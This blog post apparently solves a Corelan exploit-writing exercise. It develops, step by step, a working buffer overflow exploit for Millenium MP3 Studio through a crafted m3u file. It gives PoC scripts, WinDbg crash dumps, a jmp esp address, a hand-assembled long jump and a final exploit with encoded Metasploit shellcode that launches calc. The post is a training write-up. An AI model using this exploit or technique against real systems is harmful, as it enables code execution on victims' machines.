THE

SPRAWL

  •  
  •  
  •  
  • Corelan Team website has one of the best tutorial series on Windows exploitation. While studying the tutorial series, I came across an exercise at the end of the Tutorial 3b which I have previously skipped. I have decided to give it another go and write an exploit for it. Below are detailed steps for the development of a complete exploit.

    The Challenge

    The exercise challenges the reader to write a pure EIP overwrite exploit (as opposed to SEH-based one in the tutorial) for a vulnerable version of Millenium MP3 Studio. The download link for the executable is available in the Corelan tutorial.

    The exercise includes several hints:

    • ...try to build a working exploit for m3u files, and see if you can find a way to use an EIP overwrite (instead of SEH)

    • ... shellcode does not have to be placed after nseh/seh

    • … it can also be put in the first part of the payload buffer, and sometimes you have to use a small buffer location to write some jumpcode, so you can jump to the real shellcode

    There is also an existing PoC solution available here.

    Finding the vulnerability

    While experimenting with different buffer sizes, a buffer of size 2050 (+ 7byte 'http://' header) appeared to gain control over EIP. Below is a PoC1.py which when executed will generate an m3u file which will crash the program:

    #!/usr/bin/env python
    # PoC1.py
    
    payload = "http://" + "A"*2050
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    I have executed MP3Studio.exe from within windbg and opened exploit.m3u from the GUI.

    Here is the output of the crash:

    (144c.1674): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00125d74 ebx=41414141 ecx=00000000 edx=00000000 esi=41414141 edi=41414141
    eip=41414141 esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    41414141 ??              ???
    

    From the output above, the EIP was overwritten with 41414141 which means we can control the execution. There is also an added bonus that ESP appears to point to the place on the Stack which we control as well:

    0:000> d 00125d4c
    00125d4c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00125d5c  41 41 41 41 41 41 00 00-7c 5d 12 00 00 ca f6 00  AAAAAA..|]......
    

    Since the address 0x00125d5c contains a few As, it will make exploitation easier using the jmp esp method.

    Finding offsets

    Now is the time to figure out correct offsets in order to start building the exploit. I have used mona in order to generate a pattern of size 2100 (it will become clear why I need a few extra bytes later) and included it in PoC2.py:

    #!/usr/bin/env python
    # PoC2.py
    
    # 2100 pattern
    pattern = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A"
    "c3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae"
    "6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9"
    "Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2A"
    "j3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al"
    "6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9"
    "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2A"
    "q3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As"
    "6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9"
    "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"
    "x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az"
    "6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9"
    "Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B"
    "e3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg"
    "6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9"
    "Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2B"
    "l3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn"
    "6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9"
    "Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2B"
    "s3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
    "6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9"
    "Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2B"
    "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb"
    "6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9"
    "Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C"
    "g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci"
    "6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9"
    "Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2C"
    "n3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp"
    "6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
    )
    
    payload = "http://" + pattern[:2050]
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    After generating another exploit.m3u, I have restarted the applicating inside windbg (press Shift-F5 and F5 once more) and opened the new exploit file. The application crashed with the following output in the debugger:

    (f8.1524): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00125d74 ebx=39704338 ecx=00000000 edx=00000000 esi=70433770 edi=43367043
    eip=43307143 esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    

    43307143 ?? ???

    The EIP value 43307143 definitely looks like part of our pattern. Calculating the offset in mona, I got this:

    !mona pattern_offset 43307143
    Looking for Cq0C in pattern of 500000 bytes
     - Pattern Cq0C (0x43307143) found in Metasploit patternat position 2040
    

    Aha! So now we can create another PoC where we will overwrite EIP with the value we control. How about "BBBB"?

    #!/usr/bin/env python
    # PoC3.py
    
    payload = "http://" + "A"*2040 + "BBBB" + "C"*6
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    After repeating the process (windbg Shift-F5, F5, press l to open exploit.m3u... get used to this sequence you will be using it a lot =) ) the application crashed as expected :

    (824.d5c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00125d74 ebx=41414141 ecx=00000000 edx=00000000 esi=41414141 edi=41414141
    eip=42424242 esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    42424242 ??              ???
    

    Looking at the stack where ESP points to we can see the remaining 6 "C"s.

    0:000> d 00125d4c
    00125d4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
    00125d5c  43 43 43 43 43 43 00 00-7c 5d 12 00 00 ca f6 00  CCCCCC..|]......
    

    ESP points to 0x00125d5c which is precisely where our post EIP buffer sits.

    NOTE: For reasons I do not fully understand, it is important to keep the buffer after EIP the exact length of 6 bytes otherwise the application will not yield a controllable crash.

    While 6 bytes is sufficient for a long negative jump somewhere into the initial overflow buffer (the As), I have decided to play a bit with the payload size to see how many more bytes I can yield to put a real payload directly pointed by ESP.

    Begging for more bytes

    To find out the largest buffer I can get while still retaining control over EIP, I went back to the original PoC2.py and started playing with different pattern sizes. Finally, after some trial and error (and a few grey hairs) I found the largest payload size is 2059 + 7 bytes of 'http://':

    #!/usr/bin/env python
    # PoC2.py
    
    # 2100
    pattern = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A"
    "c3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae"
    "6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9"
    "Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2A"
    "j3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al"
    "6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9"
    "Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2A"
    "q3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As"
    "6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9"
    "Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"
    "x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az"
    "6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9"
    "Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2B"
    "e3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg"
    "6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9"
    "Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2B"
    "l3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn"
    "6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9"
    "Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2B"
    "s3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
    "6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9"
    "Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2B"
    "z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb"
    "6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9"
    "Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C"
    "g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci"
    "6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9"
    "Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2C"
    "n3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp"
    "6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
    )
    
    payload = "http://" + pattern[:2059]
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    Here is the windbg output after the crash:

    (1094.1070): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00125d74 ebx=36704335 ecx=00000000 edx=00000000 esi=70433470 edi=43337043
    eip=43377043 esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    43377043 ??              ???
    

    The EIP value of 43377043 is equivalent to the offset of 2031 which leaves us 2059 - 2031 - 4 or 24 bytes for shellcode. Unfortunately 24 bytes is not enough to put even an egghunter. While it is possible to come up with a more reliable payload in this limited space in order to seek out our shellcode, I have decided to stick with the jump approach recommended in the exercise. TODO: I will have to come back to this part again.

    The Long Jump

    Before starting to work on the next PoC, I had to attach Immunity Debugger to the fully loaded application and find address in memory for JMP ESP (or equivalent) instruction. After attaching to the application, I have executed the following mona.py command in order to find all matching addresses:

    !mona j -r esp -cpb '\x00\x0a\x0d'
    

    There were about 72 pointers found on a Windows XP SP3 machine. I have decided to use the following address which is a simple jmp esp in ntdll.dll:

    0x7c91fcd8 : jmp esp |  {PAGE_EXECUTE_READ} [ntdll.dll]
    

    Here is a new PoC with proper offsets, JMP ESP instruction and several placeholders for the shellcode and the long jump instruction:

    #!/usr/bin/env python
    # PoC4.py
    
    shellcode = "\xcc"
    
    # 0x7c91fcd8 : jmp esp |  {PAGE_EXECUTE_READ} [ntdll.dll]
    eip = "\xd8\xfc\x91\x7c"
    
    jmp = "\xcc"
    
    payload = "http://" + shellcode + "A"*(2031-len(shellcode)) + eip + jmp + "C"*(24-len(jmp))
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    Executing MP3Studio and crashing it from within windbg we get the following:

    (12c8.15e4): Break instruction exception - code 80000003 (first chance)
    eax=00125d74 ebx=41414141 ecx=00000000 edx=00000000 esi=41414141 edi=41414141
    eip=00125d5c esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    00125d5c cc              int     3
    

    Here is where we are in memory:

    0:000> d 00125d5c
    00125d5c  cc 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  .CCCCCCCCCCCCCCC
    00125d6c  43 43 43 43 43 43 43 43-20 bf fa 00 00 00 00 00  CCCCCCCC .......
    

    Looks great, we have jumped to ESP and stopped at the first byte of our jump payload. Now comes a slightly tricky part, we could calculate our jump offsets manually and write the corresponding jump assembly code manually or we could make windbg do the heavy lifting.

    First let's find where our payload begins:

    0:000> d 00125562
    00125562  68 74 74 70 3a 2f 2f cc-41 41 41 41 41 41 41 41  http://.AAAAAAAA
    00125572  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    

    From the output above we can see the beginning of our shellcode ("\xcc") located at 0x00125569.

    At this point we are going to use windbg itself to calculate the correct jump instruction as follows:

    0:000> a
    00125d5c jmp 0x00125569
    jmp 0x00125569
    00125d61
    
    0:000> u 00125d5c
    00125d5c e908f8ffff      jmp     00125569
    

    In the above output we have assembled the jmp 0x00125569 instruction in place of the current jmp placeholder. The correct assembly instruction is displayed after disassembling the very same address. So all that is left now is to update the PoC with the jump instruction "\xe9\x08\xf8\xff\xff" to perform the long jump:

    #!/usr/bin/env python
    # PoC5.py
    
    shellcode = "\xcc"
    
    # 0x7c91fcd8 : jmp esp |  {PAGE_EXECUTE_READ}
    eip = "\xd8\xfc\x91\x7c"
    
    jmp = "\xe9\x08\xf8\xff\xff"
    
    payload = "http://" + shellcode + "A"*(2031-len(shellcode)) + eip + jmp + "C"*(24-len(jmp))
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    After re-running MP3Studio we get the following crash output:

    (9b0.9b4): Break instruction exception - code 80000003 (first chance)
    eax=00125d74 ebx=41414141 ecx=00000000 edx=00000000 esi=41414141 edi=41414141
    eip=00125569 esp=00125d5c ebp=00125d7c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
    00125569 cc              int     3
    0:000> d 00125569
    00125569  cc 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  .AAAAAAAAAAAAAAA
    

    Great! We have landed perfectly in our shellcode. Now all that is left to do is to fill in the shellcode and complete the exploit.

    The Exploit

    With all the pieces in place we are now ready to finalize the exploit:

    #!/usr/bin/env python
    # MP3 Millenium Studio Exploit by iphelix
    
    shellcode = "\x90"*16
    # windows/exec - 303 bytes
    # http://www.metasploit.com
    # Encoder: x86/alpha_upper
    # EXITFUNC=seh, CMD=calc
    shellcode += (
    "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49"
    "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
    "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
    "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
    "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
    "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c"
    "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
    "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
    "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43"
    "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
    "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
    "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44"
    "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
    "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47"
    "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
    "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44"
    "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
    "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42"
    "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b"
    "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45"
    "\x31\x42\x4c\x42\x43\x45\x50\x41\x41"
    )
    
    # 0x7c91fcd8 : jmp esp |  {PAGE_EXECUTE_READ} [ntdll.dll]
    eip = "\xd8\xfc\x91\x7c"
    
    # long jump back into shellcode
    jmp = "\xe9\x08\xf8\xff\xff"
    
    payload = "http://" + shellcode + "A"*(2031-len(shellcode))
    payload+= eip + jmp + "C"*(24-len(jmp))
    
    f = open("exploit.m3u",'w')
    f.write(payload)
    f.close()
    

    After opening the m3u file generated by the exploit above we get the familiar calculator popup:

    External Links and References

    Special Note

    Thank you Peter and the Corelan Team for sharing your knowledge. You rock!

    Published on April 2nd, 2012 by iphelix

    sprawlsimilar

    corelan - tutorial 7 - exercise solution

    A solution to the AIMP2 exercise at the end of the Exploit Writing Tutorial Part 7 by Corelan Team. The solution illustrates a exploitation of Unicode applications using Venetian shellcoding techniques. Read more.

    corelan - tutorial 10 - exercise solution

    A solution to an exercise in Corelan Tutorial 10 on writing DEP and ASLR bypassing exploits. The solution illustrates grabbing leaked kernel32 address from memory, calculating an offset to VirtualProtect() and at last setting up a ROP chain to make a memory location with shellcode executable. Read more.

    getting from seh to nseh

    A collection of techniques on Windows SEH exploitation. Specifically the article covers methods of reliable exploit development by getting from a successfully overwritten pointer to Exception Handler (SEH) to the pointer to the Next Exception Handler (NSEH) struct. Read more.

    11 aug
    1996
    smashing the stack for fun and profit

    An article in the Phrack 49 by Aleph One (Elias Levy) discussion buffer overflow vulnerabilities. The article is notable for being the first comprehensive public discussion of the vulnerability as well as techniques used to exploit the vulnerability. Read more.


    sprawlcomments

    All original content on this site is copyright protected and licensed under Creative Commons - Attribution, NonCommercial, ShareAlike 4.0 International.

    π
    ///\oo/\\\